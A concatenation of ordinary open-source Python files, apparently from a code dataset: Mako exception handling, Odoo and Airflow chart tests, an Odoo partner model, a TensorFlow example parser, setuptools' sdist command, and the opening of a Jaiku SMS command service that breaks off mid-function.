# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""exception classes"""
import traceback, sys, re
class MakoException(Exception):
pass
class RuntimeException(MakoException):
pass
def _format_filepos(lineno, pos, filename):
if filename is None:
return " at line: %d char: %d" % (lineno, pos)
else:
return " in file '%s' at line: %d char: %d" % (filename, lineno, pos)
class CompileException(MakoException):
def __init__(self, message, source, lineno, pos, filename):
MakoException.__init__(self, message + _format_filepos(lineno, pos, filename))
self.lineno =lineno
self.pos = pos
self.filename = filename
self.source = source
class SyntaxException(MakoException):
def __init__(self, message, source, lineno, pos, filename):
MakoException.__init__(self, message + _format_filepos(lineno, pos, filename))
self.lineno =lineno
self.pos = pos
self.filename = filename
self.source = source
class TemplateLookupException(MakoException):
pass
class TopLevelLookupException(TemplateLookupException):
pass
class RichTraceback(object):
"""pulls the current exception from the sys traceback and extracts Mako-specific
template information.
Usage:
RichTraceback()
Properties:
error - the exception instance.
source - source code of the file where the error occured. if the error occured within a compiled template,
this is the template source.
lineno - line number where the error occured. if the error occured within a compiled template, the line number
is adjusted to that of the template source
records - a list of 8-tuples containing the original python traceback elements, plus the
filename, line number, source line, and full template source for the traceline mapped back to its originating source
template, if any for that traceline (else the fields are None).
reverse_records - the list of records in reverse
traceback - a list of 4-tuples, in the same format as a regular python traceback, with template-corresponding
traceback records replacing the originals
reverse_traceback - the traceback list in reverse
"""
def __init__(self):
(self.source, self.lineno) = ("", 0)
(t, self.error, self.records) = self._init()
if self.error is None:
self.error = t
if isinstance(self.error, CompileException) or isinstance(self.error, SyntaxException):
import mako.template
self.source = self.error.source
self.lineno = self.error.lineno
self._has_source = True
self.reverse_records = [r for r in self.records]
self.reverse_records.reverse()
def _get_reformatted_records(self, records):
for rec in records:
if rec[6] is not None:
yield (rec[4], rec[5], rec[2], rec[6])
else:
yield tuple(rec[0:4])
traceback = property(lambda self:self._get_reformatted_records(self.records), doc="""
return a list of 4-tuple traceback records (i.e. normal python format)
with template-corresponding lines remapped to the originating template
""")
reverse_traceback = property(lambda self:self._get_reformatted_records(self.reverse_records), doc="""
return the same data as traceback, except in reverse order
""")
def _init(self):
"""format a traceback from sys.exc_info() into 7-item tuples, containing
the regular four traceback tuple items, plus the original template
filename, the line number adjusted relative to the template source, and
code line from that line number of the template."""
import mako.template
mods = {}
(type, value, trcback) = sys.exc_info()
rawrecords = traceback.extract_tb(trcback)
new_trcback = []
for filename, lineno, function, line in rawrecords:
try:
(line_map, template_lines) = mods[filename]
except KeyError:
try:
info = mako.template._get_module_info(filename)
module_source = info.code
template_source = info.source
template_filename = info.template_filename or filename
except KeyError:
new_trcback.append((filename, lineno, function, line, None, None, None, None))
continue
template_ln = module_ln = 1
line_map = {}
for line in module_source.split("\n"):
match = re.match(r'\s*# SOURCE LINE (\d+)', line)
if match:
template_ln = int(match.group(1))
else:
template_ln += 1
module_ln += 1
line_map[module_ln] = template_ln
template_lines = [line for line in template_source.split("\n")]
mods[filename] = (line_map, template_lines)
template_ln = line_map[lineno]
if template_ln <= len(template_lines):
template_line = template_lines[template_ln - 1]
else:
template_line = None
new_trcback.append((filename, lineno, function, line, template_filename, template_ln, template_line, template_source))
if not self.source:
for l in range(len(new_trcback)-1, 0, -1):
if new_trcback[l][5]:
self.source = new_trcback[l][7]
self.lineno = new_trcback[l][5]
break
else:
self.source = file(new_trcback[-1][0]).read()
self.lineno = new_trcback[-1][1]
return (type, value, new_trcback)
def text_error_template(lookup=None):
"""provides a template that renders a stack trace in a similar format to the Python interpreter,
substituting source template filenames, line numbers and code for that of the originating
source template, as applicable."""
import mako.template
return mako.template.Template(r"""
<%!
from mako.exceptions import RichTraceback
%>\
<%
tback = RichTraceback()
%>\
Traceback (most recent call last):
% for (filename, lineno, function, line) in tback.traceback:
File "${filename}", line ${lineno}, in ${function or '?'}
${line | unicode.strip}
% endfor
${str(tback.error.__class__.__name__)}: ${str(tback.error)}
""")
def html_error_template():
"""provides a template that renders a stack trace in an HTML format, providing an excerpt of
code as well as substituting source template filenames, line numbers and code
for that of the originating source template, as applicable.
the template's default encoding_errors value is 'htmlentityreplace'. the template has
two options:
with the full option disabled, only a section of an HTML document is returned.
with the css option disabled, the default stylesheet won't be included."""
import mako.template
return mako.template.Template(r"""
<%!
from mako.exceptions import RichTraceback
%>
<%page args="full=True, css=True"/>
% if full:
<html>
<head>
<title>Mako Runtime Error</title>
% endif
% if css:
<style>
body { font-family:verdana; margin:10px 30px 10px 30px;}
.stacktrace { margin:5px 5px 5px 5px; }
.highlight { padding:0px 10px 0px 10px; background-color:#9F9FDF; }
.nonhighlight { padding:0px; background-color:#DFDFDF; }
.sample { padding:10px; margin:10px 10px 10px 10px; font-family:monospace; }
.sampleline { padding:0px 10px 0px 10px; }
.sourceline { margin:5px 5px 10px 5px; font-family:monospace;}
.location { font-size:80%; }
</style>
% endif
% if full:
</head>
<body>
% endif
<h2>Error !</h2>
<%
tback = RichTraceback()
src = tback.source
line = tback.lineno
if src:
lines = src.split('\n')
else:
lines = None
%>
<h3>${str(tback.error.__class__.__name__)}: ${str(tback.error)}</h3>
% if lines:
<div class="sample">
<div class="nonhighlight">
% for index in range(max(0, line-4),min(len(lines), line+5)):
% if index + 1 == line:
<div class="highlight">${index + 1} ${lines[index] | h}</div>
% else:
<div class="sampleline">${index + 1} ${lines[index] | h}</div>
% endif
% endfor
</div>
</div>
% endif
<div class="stacktrace">
% for (filename, lineno, function, line) in tback.reverse_traceback:
<div class="location">${filename}, line ${lineno}:</div>
<div class="sourceline">${line | h}</div>
% endfor
</div>
% if full:
</body>
</html>
% endif
""", output_encoding=sys.getdefaultencoding(), encoding_errors='htmlentityreplace')
| bsd-3-clause |
apanju/GMIO_Odoo | addons/project/tests/test_project_flow.py | 198 | 8762 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2013-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from .test_project_base import TestProjectBase
from openerp.exceptions import AccessError
from openerp.tools import mute_logger
EMAIL_TPL = """Return-Path: <[email protected]>
X-Original-To: {email_to}
Delivered-To: {email_to}
To: {email_to}
Received: by mail1.openerp.com (Postfix, from userid 10002)
id 5DF9ABFB2A; Fri, 10 Aug 2012 16:16:39 +0200 (CEST)
Message-ID: {msg_id}
Date: Tue, 29 Nov 2011 12:43:21 +0530
From: {email_from}
MIME-Version: 1.0
Subject: {subject}
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Hello,
This email should create a new entry in your module. Please check that it
effectively works.
Thanks,
--
Raoul Boitempoils
Integrator at Agrolait"""
class TestProjectFlow(TestProjectBase):
@mute_logger('openerp.addons.base.ir.ir_model', 'openerp.models')
def test_00_project_process(self):
""" Testing project management """
cr, uid, user_projectuser_id, user_projectmanager_id, project_pigs_id = self.cr, self.uid, self.user_projectuser_id, self.user_projectmanager_id, self.project_pigs_id
# ProjectUser: set project as template -> raise
self.assertRaises(AccessError, self.project_project.set_template, cr, user_projectuser_id, [project_pigs_id])
# Other tests are done using a ProjectManager
project = self.project_project.browse(cr, user_projectmanager_id, project_pigs_id)
self.assertNotEqual(project.state, 'template', 'project: incorrect state, should not be a template')
# Set test project as template
self.project_project.set_template(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'template', 'project: set_template: project state should be template')
self.assertEqual(len(project.tasks), 0, 'project: set_template: project tasks should have been set inactive')
# Duplicate template
new_template_act = self.project_project.duplicate_template(cr, user_projectmanager_id, [project_pigs_id])
new_project = self.project_project.browse(cr, user_projectmanager_id, new_template_act['res_id'])
self.assertEqual(new_project.state, 'open', 'project: incorrect duplicate_template')
self.assertEqual(len(new_project.tasks), 2, 'project: duplicating a project template should duplicate its tasks')
# Convert into real project
self.project_project.reset_project(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'open', 'project: resetted project should be in open state')
self.assertEqual(len(project.tasks), 2, 'project: reset_project: project tasks should have been set active')
# Put as pending
self.project_project.set_pending(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'pending', 'project: should be in pending state')
# Re-open
self.project_project.set_open(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'open', 'project: reopened project should be in open state')
# Close project
self.project_project.set_done(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'close', 'project: closed project should be in close state')
# Re-open
self.project_project.set_open(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
# Re-convert into a template and schedule tasks
self.project_project.set_template(cr, user_projectmanager_id, [project_pigs_id])
self.project_project.schedule_tasks(cr, user_projectmanager_id, [project_pigs_id])
# Copy the project
new_project_id = self.project_project.copy(cr, user_projectmanager_id, project_pigs_id)
new_project = self.project_project.browse(cr, user_projectmanager_id, new_project_id)
self.assertEqual(len(new_project.tasks), 2, 'project: copied project should have copied task')
# Cancel the project
self.project_project.set_cancel(cr, user_projectmanager_id, [project_pigs_id])
self.assertEqual(project.state, 'cancelled', 'project: cancelled project should be in cancel state')
def test_10_task_process(self):
""" Testing task creation and management """
cr, uid, user_projectuser_id, user_projectmanager_id, project_pigs_id = self.cr, self.uid, self.user_projectuser_id, self.user_projectmanager_id, self.project_pigs_id
def format_and_process(template, email_to='[email protected], [email protected]', subject='Frogs',
email_from='Patrick Ratatouille <[email protected]>',
msg_id='<[email protected]>'):
self.assertEqual(self.project_task.search(cr, uid, [('name', '=', subject)]), [])
mail = template.format(email_to=email_to, subject=subject, email_from=email_from, msg_id=msg_id)
self.mail_thread.message_process(cr, uid, None, mail)
return self.project_task.search(cr, uid, [('name', '=', subject)])
# Do: incoming mail from an unknown partner on an alias creates a new task 'Frogs'
frogs = format_and_process(EMAIL_TPL)
# Test: one task created by mailgateway administrator
self.assertEqual(len(frogs), 1, 'project: message_process: a new project.task should have been created')
task = self.project_task.browse(cr, user_projectuser_id, frogs[0])
res = self.project_task.get_metadata(cr, uid, [task.id])[0].get('create_uid') or [None]
self.assertEqual(res[0], uid,
'project: message_process: task should have been created by uid as alias_user_id is False on the alias')
# Test: messages
self.assertEqual(len(task.message_ids), 3,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[2].subtype_id.name, 'Task Created',
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[1].subtype_id.name, 'Task Assigned',
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[0].author_id.id, self.email_partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Frogs',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Frogs', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_pigs_id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, 1, 'project_task: should have a stage with sequence=1')
# Open the delegation wizard
delegate_id = self.project_task_delegate.create(cr, user_projectuser_id, {
'user_id': user_projectuser_id,
'planned_hours': 12.0,
'planned_hours_me': 2.0,
}, {'active_id': task.id})
self.project_task_delegate.delegate(cr, user_projectuser_id, [delegate_id], {'active_id': task.id})
# Check delegation details
task.refresh()
self.assertEqual(task.planned_hours, 2, 'project_task_delegate: planned hours is not correct after delegation')
| agpl-3.0 |
DinoCow/airflow | chart/tests/test_basic_helm_chart.py | 2 | 5185 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from typing import Any, Dict, List, Union
import jmespath
from tests.helm_template_generator import render_chart
OBJECT_COUNT_IN_BASIC_DEPLOYMENT = 24
class TestBaseChartTest(unittest.TestCase):
def test_basic_deployments(self):
k8s_objects = render_chart(
"TEST-BASIC",
values={
"chart": {
'metadata': 'AA',
},
'labels': {"TEST-LABEL": "TEST-VALUE"},
},
)
list_of_kind_names_tuples = [
(k8s_object['kind'], k8s_object['metadata']['name']) for k8s_object in k8s_objects
]
self.assertEqual(
list_of_kind_names_tuples,
[
('ServiceAccount', 'TEST-BASIC-scheduler'),
('ServiceAccount', 'TEST-BASIC-webserver'),
('ServiceAccount', 'TEST-BASIC-worker'),
('Secret', 'TEST-BASIC-postgresql'),
('Secret', 'TEST-BASIC-airflow-metadata'),
('Secret', 'TEST-BASIC-airflow-result-backend'),
('ConfigMap', 'TEST-BASIC-airflow-config'),
('Role', 'TEST-BASIC-pod-launcher-role'),
('Role', 'TEST-BASIC-pod-log-reader-role'),
('RoleBinding', 'TEST-BASIC-pod-launcher-rolebinding'),
('RoleBinding', 'TEST-BASIC-pod-log-reader-rolebinding'),
('Service', 'TEST-BASIC-postgresql-headless'),
('Service', 'TEST-BASIC-postgresql'),
('Service', 'TEST-BASIC-statsd'),
('Service', 'TEST-BASIC-webserver'),
('Deployment', 'TEST-BASIC-scheduler'),
('Deployment', 'TEST-BASIC-statsd'),
('Deployment', 'TEST-BASIC-webserver'),
('StatefulSet', 'TEST-BASIC-postgresql'),
('Secret', 'TEST-BASIC-fernet-key'),
('Secret', 'TEST-BASIC-redis-password'),
('Secret', 'TEST-BASIC-broker-url'),
('Job', 'TEST-BASIC-create-user'),
('Job', 'TEST-BASIC-run-airflow-migrations'),
],
)
self.assertEqual(OBJECT_COUNT_IN_BASIC_DEPLOYMENT, len(k8s_objects))
for k8s_object in k8s_objects:
labels = jmespath.search('metadata.labels', k8s_object) or {}
if 'postgresql' in labels.get('chart'):
continue
k8s_name = k8s_object['kind'] + ":" + k8s_object['metadata']['name']
self.assertEqual(
'TEST-VALUE',
labels.get("TEST-LABEL"),
f"Missing label TEST-LABEL on {k8s_name}. Current labels: {labels}",
)
def test_basic_deployment_without_default_users(self):
k8s_objects = render_chart("TEST-BASIC", {"webserver": {'defaultUser': {'enabled': False}}})
list_of_kind_names_tuples = [
(k8s_object['kind'], k8s_object['metadata']['name']) for k8s_object in k8s_objects
]
self.assertNotIn(('Job', 'TEST-BASIC-create-user'), list_of_kind_names_tuples)
self.assertEqual(OBJECT_COUNT_IN_BASIC_DEPLOYMENT - 1, len(k8s_objects))
def test_chart_is_consistent_with_official_airflow_image(self):
def get_k8s_objs_with_image(obj: Union[List[Any], Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Recursive helper to retrieve all the k8s objects that have an "image" key
inside k8s obj or list of k8s obj
"""
out = []
if isinstance(obj, list):
for item in obj:
out += get_k8s_objs_with_image(item)
if isinstance(obj, dict):
if "image" in obj:
out += [obj]
# include sub objs, just in case
for val in obj.values():
out += get_k8s_objs_with_image(val)
return out
image_repo = "test-airflow-repo/airflow"
k8s_objects = render_chart("TEST-BASIC", {"defaultAirflowRepository": image_repo})
objs_with_image = get_k8s_objs_with_image(k8s_objects)
for obj in objs_with_image:
image: str = obj["image"] # pylint: disable=invalid-sequence-index
if image.startswith(image_repo):
# Make sure that a command is not specified
self.assertNotIn("command", obj)
| apache-2.0 |
kailIII/emaresa | trunk.cl/l10n_cl_partner_emaresa/l10n_cl_partner_emaresa.py | 3 | 1991 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: OpenDrive Ltda
# Copyright (c) 2013 Opendrive Ltda
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import netsvc
import pooler
from osv import osv
from osv import fields
class res_partner(osv.osv):
# _name = 'res.partner'
_inherit = 'res.partner'
_columns = {
# 'ruc': fields.char('RUC', size=30),
'sucursal': fields.char('Sucursal', size=30),
'roi_type' : fields.selection([('dni','DNI o LE'),('ruc','RUC'),('carm', 'Carnet Militar'), ('care', 'Carnet de Extranjeria')], 'ROI tipo'),
'date_credit': fields.date('Vigencia Linea de Credito', required=False),
}
_sql_constraints = [
('sucursal_uniq', 'unique (sucursal)', 'La Sucursal Existe en el Sistema -- Favor verificar sus datos ingresados!'),
]
res_partner()
| agpl-3.0 |
liyi193328/seq2seq | seq2seq/contrib/learn/dataframe/transforms/example_parser.py | 26 | 2407 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Transform that parses serialized tensorflow.Example protos."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.learn.python.learn.dataframe import transform
from tensorflow.python.ops import parsing_ops
class ExampleParser(transform.TensorFlowTransform):
"""A Transform that parses serialized `tensorflow.Example` protos."""
def __init__(self, features):
"""Initialize `ExampleParser`.
The `features` argument must be an object that can be converted to an
`OrderedDict`. The keys should be strings and will be used to name the
output. Values should be either `VarLenFeature` or `FixedLenFeature`. If
`features` is a dict, it will be sorted by key.
Args:
features: An object that can be converted to an `OrderedDict` mapping
column names to feature definitions.
"""
super(ExampleParser, self).__init__()
if isinstance(features, dict):
self._ordered_features = collections.OrderedDict(sorted(features.items(
), key=lambda f: f[0]))
else:
self._ordered_features = collections.OrderedDict(features)
@property
def name(self):
return "ExampleParser"
@property
def input_valency(self):
return 1
@property
def _output_names(self):
return list(self._ordered_features.keys())
@transform._parameter # pylint: disable=protected-access
def feature_definitions(self):
return self._ordered_features
def _apply_transform(self, input_tensors, **kwargs):
parsed_values = parsing_ops.parse_example(input_tensors[0],
features=self._ordered_features)
# pylint: disable=not-callable
return self.return_type(**parsed_values)
| apache-2.0 |
ian-garrett/meetMe | env/lib/python3.4/site-packages/setuptools/command/sdist.py | 385 | 7079 | from glob import glob
from distutils import log
import distutils.command.sdist as orig
import os
import sys
from setuptools.compat import PY3
from setuptools.utils import cs_path_exists
import pkg_resources
READMES = 'README', 'README.rst', 'README.txt'
_default_revctrl = list
def walk_revctrl(dirname=''):
"""Find all files under revision control"""
for ep in pkg_resources.iter_entry_points('setuptools.file_finders'):
for item in ep.load()(dirname):
yield item
class sdist(orig.sdist):
"""Smart sdist that finds anything supported by revision control"""
user_options = [
('formats=', None,
"formats for source distribution (comma-separated list)"),
('keep-temp', 'k',
"keep the distribution tree around after creating " +
"archive file(s)"),
('dist-dir=', 'd',
"directory to put the source distribution archive(s) in "
"[default: dist]"),
]
negative_opt = {}
def run(self):
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
self.filelist = ei_cmd.filelist
self.filelist.append(os.path.join(ei_cmd.egg_info, 'SOURCES.txt'))
self.check_readme()
# Run sub commands
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
# Call check_metadata only if no 'check' command
# (distutils <= 2.6)
import distutils.command
if 'check' not in distutils.command.__all__:
self.check_metadata()
self.make_distribution()
dist_files = getattr(self.distribution, 'dist_files', [])
for file in self.archive_files:
data = ('sdist', '', file)
if data not in dist_files:
dist_files.append(data)
def __read_template_hack(self):
# This grody hack closes the template file (MANIFEST.in) if an
# exception occurs during read_template.
# Doing so prevents an error when easy_install attempts to delete the
# file.
try:
orig.sdist.read_template(self)
except:
_, _, tb = sys.exc_info()
tb.tb_next.tb_frame.f_locals['template'].close()
raise
# Beginning with Python 2.7.2, 3.1.4, and 3.2.1, this leaky file handle
# has been fixed, so only override the method if we're using an earlier
# Python.
has_leaky_handle = (
sys.version_info < (2, 7, 2)
or (3, 0) <= sys.version_info < (3, 1, 4)
or (3, 2) <= sys.version_info < (3, 2, 1)
)
if has_leaky_handle:
read_template = __read_template_hack
def add_defaults(self):
standards = [READMES,
self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if cs_path_exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = list(filter(cs_path_exists, glob(pattern)))
if files:
self.filelist.extend(files)
# getting python files
if self.distribution.has_pure_modules():
build_py = self.get_finalized_command('build_py')
self.filelist.extend(build_py.get_source_files())
# This functionality is incompatible with include_package_data, and
# will in fact create an infinite recursion if include_package_data
# is True. Use of include_package_data will imply that
# distutils-style automatic handling of package_data is disabled
if not self.distribution.include_package_data:
for _, src_dir, _, filenames in build_py.data_files:
self.filelist.extend([os.path.join(src_dir, filename)
for filename in filenames])
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def check_readme(self):
for f in READMES:
if os.path.exists(f):
return
else:
self.warn(
"standard file not found: should have one of " +
', '.join(READMES)
)
def make_release_tree(self, base_dir, files):
orig.sdist.make_release_tree(self, base_dir, files)
# Save any egg_info command line options used to create this sdist
dest = os.path.join(base_dir, 'setup.cfg')
if hasattr(os, 'link') and os.path.exists(dest):
# unlink and re-copy, since it might be hard-linked, and
# we don't want to change the source version
os.unlink(dest)
self.copy_file('setup.cfg', dest)
self.get_finalized_command('egg_info').save_version_info(dest)
def _manifest_is_not_generated(self):
# check for special comment used in 2.7.1 and higher
if not os.path.isfile(self.manifest):
return False
fp = open(self.manifest, 'rbU')
try:
first_line = fp.readline()
finally:
fp.close()
return (first_line !=
'# file GENERATED by distutils, do NOT edit\n'.encode())
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
manifest = open(self.manifest, 'rbU')
for line in manifest:
# The manifest must contain UTF-8. See #303.
if PY3:
try:
line = line.decode('UTF-8')
except UnicodeDecodeError:
log.warn("%r not UTF-8 decodable -- skipping" % line)
continue
# ignore comments and blank lines
line = line.strip()
if line.startswith('#') or not line:
continue
self.filelist.append(line)
manifest.close()
| artistic-2.0 |
ridhoillyasa/jaikuengine | common/sms.py | 34 | 10152 | import logging
import re
from django.conf import settings
from common import api
from common import clean
from common import exception
from common import patterns
from common import user
from common import util
from common.protocol import base
from common.protocol import sms
HELP_HUH = "Sorry, did not understand \"%s\". Send HELP for commands"
HELP_WELCOME = "Welcome to %s SMS! Questions? Contact support@%s" % (settings.SITE_NAME, settings.NS_DOMAIN)
HELP_WELCOME_NICK = "Welcome to %s SMS %s! Questions? Contact support@%s" % (settings.SITE_NAME, '%s', settings.NS_DOMAIN)
HELP_DOUBLE_OPT_IN = "To confirm you'd like to receive SMS updates, reply YES. You'll only have to do this once."
HELP_SIGNED_OUT = "You have signed out."
HELP_CHARGES = "%s is free. Other charges may apply." % (settings.SITE_NAME)
HELP_HELP_1 = "%s SMS updates. To get alerts text FOLLOW user/channelname. To stop text LEAVE user/channelname. To stop all alerts text STOP. To resume text START" % (settings.SITE_NAME)
HELP_HELP_2 = "Complete list on %s/sms. Other charges may apply. Questions? Contact support@%s" % (settings.DOMAIN, settings.NS_DOMAIN)
HELP_NOT_SIGNED_IN = "You are currently signed out\n"
HELP_SIGNED_IN_AS = "You are signed in as '%s'\n"
HELP_FOLLOW_ONLY = "You are signed in as a follow-only user\n"
HELP_PASSWORD = "Your password is: %s\n" \
"Use it to sign in on the web at http://%s/\n" % ('%s', settings.DOMAIN)
HELP_POST = "To post to your stream, just send a message"
HELP_CHANNEL_POST = "To post to a channel, start your message with " \
"#channel"
HELP_COMMENT = "To comment on the latest update from someone, start " \
"with @user"
HELP_FOLLOW = "To follow a user or channel, send FOLLOW <user/#channel>"
HELP_FOLLOW_NEW = "Send FOLLOW <user/#channel> to just follow a user or " \
"channel without signing up"
HELP_LEAVE = "To stop following a user or channel, send LEAVE <user/#channel>"
HELP_STOP = "To stop all alerts, send OFF"
HELP_START = "To turn on alerts, send ON"
HELP_SIGN_OUT = "To sign out from %s SMS, send SIGN OUT" % (settings.SITE_NAME)
HELP_DELETE_ME = "To remove your %s account, send DELETE ME" % (settings.SITE_NAME)
HELP_SIGN_IN = "Send SIGN IN <screen name> <password> if you already have a " \
"%s account" % (settings.SITE_NAME)
HELP_SIGN_UP = "Send SIGN UP <desired screen name> to create a new account"
HELP_MORE = "For more commands, type HELP"
HELP_FOOTER = "\n" \
"Questions? Visit http://%s/help/im\n" \
"Contact us at support@%s" % (settings.DOMAIN, settings.NS_DOMAIN)
HELP_FOOTER_INFORMAL = "\n" \
"How it all works: http://%s/help/im" % (settings.DOMAIN)
HELP_OTR = "Your IM client has tried to initiate an OTR (off-the-record) session. However, this bot does not support OTR."
HELP_START_NOTIFICATIONS = "SMS notifications have been enabled. Send OFF to stop, HELP for commands."
HELP_STOP_NOTIFICATIONS = "SMS notifications have been disabled. Send ON to start receiving again."
class SmsService(base.Service):
handlers = [patterns.SignInHandler,
patterns.SignOutHandler,
patterns.PromotionHandler,
patterns.HelpHandler,
patterns.CommentHandler,
patterns.OnHandler,
patterns.OffHandler,
patterns.ChannelPostHandler,
patterns.FollowHandler,
patterns.LeaveHandler,
patterns.ConfirmHandler,
patterns.PostHandler,
]
# TODO(termie): the following should probably be part of some sort of
# service interface, it is almost an exact duplicate of
# ImService
def response_ok(self, rv=None):
return ""
def response_error(self, exc):
return str(exc)
def channel_join(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
channel = clean.channel(nick)
try:
api.channel_join(sender_ref, sender_ref.nick, channel)
self.send_message((sender,),
"%s joined %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to join %s" % nick)
def channel_part(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
channel = clean.channel(nick)
try:
api.channel_part(sender_ref, sender_ref.nick, channel)
self.send_message((sender,),
"%s left %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to leave %s" % nick)
def confirm(self, sender):
""" confirm something if something needs to be confirmed
otherwise, just post the message
"""
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
if sender_ref.extra.get('sms_double_opt_in', None):
api.mobile_confirm_doubleoptin(api.ROOT, sender_ref.nick)
self.start_notifications(sender)
def actor_add_contact(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
clean_nick = clean.nick(nick)
try:
api.actor_add_contact(sender_ref, sender_ref.nick, clean_nick)
self.send_message((sender,),
"%s followed %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to follow %s" % nick)
def actor_remove_contact(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
clean_nick = clean.nick(nick)
try:
api.actor_remove_contact(sender_ref, sender_ref.nick, clean_nick)
self.send_message((sender,),
"%s stopped following %s" % (sender_ref.dispaly_nick(),
nick))
except:
self.send_message((sender,),
"Failed to stop following %s" % nick)
def send_message(self, to_list, message):
self.connection.send_message(to_list, message)
def unknown(self, sender, message):
self.send_message([sender], HELP_HUH % message)
def sign_in(self, sender, nick, password):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if sender_ref:
raise exception.ValidationError(
"You are already signed in, please SIGN OUT first")
user_ref = user.authenticate_user_login(nick, password)
if not user_ref:
raise exception.ValidationError("Username or password is incorrect")
mobile_ref = api.mobile_associate(api.ROOT, user_ref.nick, sender)
# if they need to double opt in send them the confirmation message
welcome = ' '.join([HELP_WELCOME_NICK % user_ref.display_nick(),
HELP_POST,
HELP_START,
HELP_CHARGES
])
self.send_message([sender], welcome)
def sign_out(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
